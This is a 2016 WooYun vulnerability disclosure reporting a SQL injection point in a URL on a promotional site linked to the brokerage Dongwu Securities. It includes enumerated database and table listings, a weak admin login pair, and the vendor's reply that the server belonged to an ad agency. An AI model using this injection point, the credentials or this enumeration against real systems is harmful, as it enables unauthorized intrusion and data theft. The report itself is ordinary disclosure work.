漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0166901
漏洞标题:东吴证券SQL注入进后台
相关厂商:东吴证券
漏洞作者: darkrerror
提交时间:2016-01-03 00:07
修复时间:2016-02-12 18:49
公开时间:2016-02-12 18:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-03: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开
简要描述:
RT
详细说明:
http://hd.dwzq.com.cn:2168/ajax/ajaxhandle.ashx?act=checkuser&username=test1[注入点]&t=0.523551341611892
影响库:
available databases [25]:
[*] bugtracer
[*] citicAgent
[*] citicGuoxin
[*] CPA
[*] db_adclickmgt
[*] dongwu20years
[*] easyforex_contest
[*] epf
[*] Fund_bbs
[*] Fund_home_App
[*] FundBaseProject
[*] gdqz
[*] happyinvest
[*] lumigent
[*] master
[*] MedicalActivities
[*] model
[*] msdb
[*] Pinlive
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] weixin
[*] xingye2013
[*] yaodaren2013
管理员账号密码:
论坛弱口令
某业务弱口令
test/123456
漏洞证明:
Database: Fund_bbs
[61 tables]
+------------------------+
| dnt_admingroups |
| dnt_adminvisitlog |
| dnt_advertisements |
| dnt_announcements |
| dnt_attachments |
| dnt_attachpaymentlog |
| dnt_attachtypes |
| dnt_banned |
| dnt_bbcodes |
| dnt_bonuslog |
| dnt_creditslog |
| dnt_debatediggs |
| dnt_debates |
| dnt_failedlogins |
| dnt_favorites |
| dnt_forumfields |
| dnt_forumlinks |
| dnt_forums |
| dnt_help |
| dnt_invitation |
| dnt_locations |
| dnt_medalslog |
| dnt_medalslog |
| dnt_moderatormanagelog |
| dnt_moderators |
| dnt_myattachments |
| dnt_myposts |
| dnt_mytopics |
| dnt_navs |
| dnt_notices |
| dnt_onlinelist |
| dnt_onlinelist |
| dnt_onlinetime |
| dnt_orders |
| dnt_paymentlog |
| dnt_pms |
| dnt_polloptions |
| dnt_polls |
| dnt_postdebatefields |
| dnt_postid |
| dnt_posts1 |
| dnt_ratelog |
| dnt_scheduledevents |
| dnt_searchcaches |
| dnt_smilies |
| dnt_statistics |
| dnt_stats |
| dnt_statvars |
| dnt_tablelist |
| dnt_tags |
| dnt_templates |
| dnt_topicidentify |
| dnt_topics |
| dnt_topictagcaches |
| dnt_topictags |
| dnt_topictypes |
| dnt_trendstat |
| dnt_userfields |
| dnt_usergroups |
| dnt_users |
| dnt_words |
修复方案:
加强过滤,防止绕过。
数据库重要信息加密。
版权声明:转载请注明来源 darkrerror@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:2
确认时间:2016-01-04 10:14
厂商回复:
已通知处理。本身服务器不是我公司使用。 也已通用。
最新状态:
2016-01-04:非我公司网站,请不要公开!!谢谢。
2016-01-04:
2016-01-04:此连接仅为我公司周年庆时的外链,为一家广告公司。非我官网所属。目前二级域名已经停用。
2016-01-04: